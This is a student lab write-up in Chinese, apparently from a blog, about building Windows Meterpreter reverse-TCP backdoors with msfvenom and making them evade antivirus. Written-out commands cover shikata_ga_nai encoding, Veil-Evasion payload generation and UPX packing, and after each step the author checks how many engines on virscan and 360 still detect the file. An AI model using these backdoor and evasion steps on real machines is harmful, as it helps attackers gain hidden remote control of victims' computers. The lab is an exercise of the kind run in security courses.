linux終端:python
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor.exe
(linux的ip地址)linux
將生成的後門文件上傳到virscan網站掃描,發現有19個軟件都能發現
shell
接下來咱們經過改變特徵碼的方法來實現免殺:windows
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor1.exe
然而並無什麼用安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor2.exe
能夠看出報毒的引擎減小到16個。效果彷佛並無那麼明顯,根據課上所學,多是由於編碼以後老是會有差很少相似的頭部來解釋如何將文件還原,而殺毒軟件恰好就利用這一特徵進行殺毒,因此仍是特徵碼的問題。網絡
veil-Evasion是一個與Metasploit有點相似的軟件,已經在kali虛擬機裏,若是沒有能夠進行在線安裝:sudo apt-get install veil-evasiontcp
可是我沒有成功,全部接下來的這部分實驗是用同窗的電腦完成的學習
在終端下輸入指令veil
便可打開軟件,根據提示依次鍵入如下指令:網站
use python/meterpreter/rev_tcp
//設置payload編碼
set LHOST 172.30.6.226
//設置反彈鏈接IP
set port 4308
//設置反彈端口4308
generate
//生成
backdoor3
//程序名
1
生成的文件能夠在 其餘位置->電腦 裏按照它提示的目錄找到
檢測以後發現報毒軟件少了不少,但仍是有。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.130 LPORT=4308 -f c
試一下上次沒成功的拍照功能
此次成功了
只有少數軟件報毒,和以前的19個仍是有很明顯的對比的。
再送去360看看(專門查殺這個exe文件)
真是一如既往的讓人難過,沒有任何反應。
直接用upx將以前生成的c.exe文件加殼,改個文件名
送去查殺
報毒軟件又少了一個。雖然還不太明白加殼是什麼意思,可是能看到有一點點免殺的做用。